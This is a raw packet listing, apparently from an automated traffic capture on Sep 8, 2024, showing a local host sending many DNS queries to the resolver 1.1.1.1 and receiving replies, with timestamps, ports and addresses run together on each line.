                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014231920 CEST5155853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014261961 CEST5503553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014791965 CEST4966453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.014849901 CEST5374853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.015237093 CEST5887453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.015561104 CEST5141253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.015604019 CEST5988953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016031981 CEST5106853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016138077 CEST6350453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016485929 CEST5139153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.016628027 CEST5334153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.017007113 CEST5622253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.017124891 CEST6228853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.017409086 CEST5075753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.018050909 CEST6542353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.025969028 CEST6431453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.026254892 CEST6468553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.026511908 CEST5529053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.026988029 CEST5037653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.029397011 CEST4991153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.029603958 CEST6421853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.029814005 CEST4936153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030227900 CEST5898753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030301094 CEST53509701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030333042 CEST53586391.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030344963 CEST53534951.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030355930 CEST53611101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030478954 CEST6425253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.030596018 CEST5407153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.031342030 CEST53535151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.031384945 CEST53496641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.031488895 CEST53588741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.032459974 CEST53515581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.032473087 CEST53514121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.033407927 CEST53507571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.033768892 CEST53513911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.033781052 CEST53562221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.034126997 CEST53635041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.034301996 CEST53654231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.035715103 CEST53554221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.036170006 CEST53646851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.036370039 CEST53643141.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.036802053 CEST53552901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.037882090 CEST53503761.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.038156986 CEST53537481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.039237022 CEST53499111.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.039293051 CEST53642181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.039988041 CEST53510681.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.040024996 CEST53642521.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.040086031 CEST53540711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.040721893 CEST53598891.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.046578884 CEST53493611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.049237013 CEST6421053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.049276114 CEST53582701.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.051295996 CEST5560253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054205894 CEST5001053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054507017 CEST53533411.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.054773092 CEST4961253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.058564901 CEST6334053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.058809996 CEST53642101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.059580088 CEST6008453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.059842110 CEST5762353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060029030 CEST5501653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060473919 CEST5396153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060683966 CEST5087353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.060883045 CEST6118553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061512947 CEST5700153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061876059 CEST6295153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.061975002 CEST5538253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.062109947 CEST5689153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.062223911 CEST4954353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063462973 CEST6023253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063647032 CEST6134753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.063831091 CEST5032953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.064554930 CEST53496121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.067181110 CEST53556021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.067257881 CEST6492353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.068629026 CEST53633401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069312096 CEST53600841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069498062 CEST53539611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069914103 CEST53500101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069930077 CEST53508731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.069941044 CEST53611851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.070240021 CEST53613471.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.070847034 CEST53570011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.071012974 CEST53629511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.071023941 CEST53553821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.071611881 CEST53495431.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.072699070 CEST53602321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.072837114 CEST53550161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.073729038 CEST53503291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.075195074 CEST5104253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.076566935 CEST53576231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.077785015 CEST53568911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080102921 CEST5589353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080102921 CEST5226653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.080390930 CEST5586353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090260983 CEST53522661.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090387106 CEST53558631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090682030 CEST53558931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.090986013 CEST53649231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.105345011 CEST53510421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.140460014 CEST53639921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.183383942 CEST53622881.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.183713913 CEST53503751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.183934927 CEST53550351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.197628021 CEST53589871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.649528980 CEST5558053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.657603979 CEST5857853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.657672882 CEST6355053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658379078 CEST5201253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658463001 CEST5673053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.658953905 CEST5261853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659473896 CEST6085753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659483910 CEST6201753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.659488916 CEST53555801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.660043001 CEST5779053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.662333965 CEST5930353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.663938999 CEST5408053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.664427996 CEST5050253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.665617943 CEST5328353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.666142941 CEST6139353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.667268038 CEST53520121.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.667319059 CEST53635501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.668716908 CEST53567301.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.669244051 CEST53526181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670207024 CEST6022553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670342922 CEST53577901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670356035 CEST53608571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.670707941 CEST5057253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.671252966 CEST6156253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.671746969 CEST53593031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.673577070 CEST53585781.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.674283028 CEST53505021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.675086975 CEST53620171.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.676008940 CEST53613931.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.679363966 CEST5866753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.679517031 CEST53540801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.680676937 CEST53505721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.682884932 CEST6135953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.686012983 CEST53602251.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687088013 CEST53615621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687446117 CEST5203553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687484980 CEST6345353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.687681913 CEST5400353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.688375950 CEST53586671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.692344904 CEST53613591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.695707083 CEST53532831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.696197033 CEST53540031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.696558952 CEST53520351.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.696620941 CEST53634531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.752739906 CEST5588153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.753673077 CEST5075753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754049063 CEST5157153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754383087 CEST5611553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.754899979 CEST6455353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.755299091 CEST6449053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.757661104 CEST4948253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758240938 CEST5266053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758469105 CEST6269153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.758831024 CEST5299153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.762509108 CEST53558811.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.763958931 CEST53507571.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.764122009 CEST53561151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.764751911 CEST53644901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.765578032 CEST53645531.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.767116070 CEST53494821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.767360926 CEST53526601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.768217087 CEST53626911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.768841028 CEST53529911.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.769645929 CEST53515711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.807265997 CEST5601553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.809520006 CEST6381853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.823537111 CEST53638181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.824064970 CEST53560151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.844377995 CEST6129953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.844692945 CEST5297553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.845185995 CEST5140353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.845737934 CEST5787153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.846316099 CEST6090753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.855202913 CEST53514031.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.856286049 CEST53578711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.860464096 CEST53612991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.875936031 CEST53529751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.876779079 CEST53609071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.889175892 CEST5493753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.889395952 CEST5181653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890141010 CEST5636353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890355110 CEST5412253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890544891 CEST6076453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890707970 CEST5662453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.890830994 CEST5851053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.891057014 CEST6479753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.891599894 CEST5574053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892011881 CEST6133753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892046928 CEST5533653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892308950 CEST5012853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892323971 CEST6254653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892570019 CEST5370153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892580986 CEST5479853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892821074 CEST5120453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.892843962 CEST5746553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.893069029 CEST5510053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.894666910 CEST5406753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.897277117 CEST53607641.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.898313046 CEST6498453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.899605036 CEST53549371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.899979115 CEST6179053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.900017977 CEST5674853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.900084972 CEST53563631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.900249958 CEST53541221.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.901614904 CEST53647971.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.901628017 CEST53625461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.901724100 CEST53501281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.902024984 CEST53553361.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.902060986 CEST53613371.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.902251005 CEST53547981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.902683973 CEST53551001.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.902698040 CEST53574651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.904356003 CEST6544953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.904520035 CEST53540671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.905463934 CEST53518161.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.907170057 CEST53585101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.908571005 CEST53512041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.909789085 CEST53567481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.913439035 CEST5595053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.913733959 CEST53654491.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.913944006 CEST53649841.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.916064024 CEST53617901.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.922271967 CEST5832453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.932024956 CEST53537011.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.933165073 CEST53559501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:29.959882021 CEST53583241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.049349070 CEST53557401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.053060055 CEST53566241.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.397439957 CEST6455153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.406320095 CEST53645511.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.408876896 CEST5554653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.409567118 CEST5919953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.409778118 CEST5412853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.410096884 CEST5444453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.411237001 CEST5450853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.412486076 CEST6080753192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.412837029 CEST5257553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413136959 CEST5047253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413275003 CEST6517453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413590908 CEST6338353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.413721085 CEST5466153192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414110899 CEST5373553192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414172888 CEST5039953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414628983 CEST5736353192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.414679050 CEST5357453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.415478945 CEST5493953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.415599108 CEST5092953192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416081905 CEST5084453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416312933 CEST53591991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416321039 CEST6160653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.416976929 CEST5318253192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.417054892 CEST5219853192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.417526960 CEST6232653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.418194056 CEST5720453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.418657064 CEST5458053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.419060946 CEST53541281.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.419297934 CEST5574453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.419610977 CEST53555461.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.420408010 CEST6404453192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.422363997 CEST53525751.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.422489882 CEST5254053192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.422653913 CEST53608071.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.422728062 CEST53504721.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.423077106 CEST53651741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.423379898 CEST53633831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.423638105 CEST4982653192.168.2.41.1.1.1
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.423721075 CEST53503991.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.424261093 CEST53535741.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.424339056 CEST53573631.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.425215006 CEST53546611.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.425385952 CEST53509291.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.426352024 CEST53544441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.426574945 CEST53508441.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427248955 CEST53531821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427424908 CEST53521981.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:30.427587032 CEST53623261.1.1.1192.168.2.4
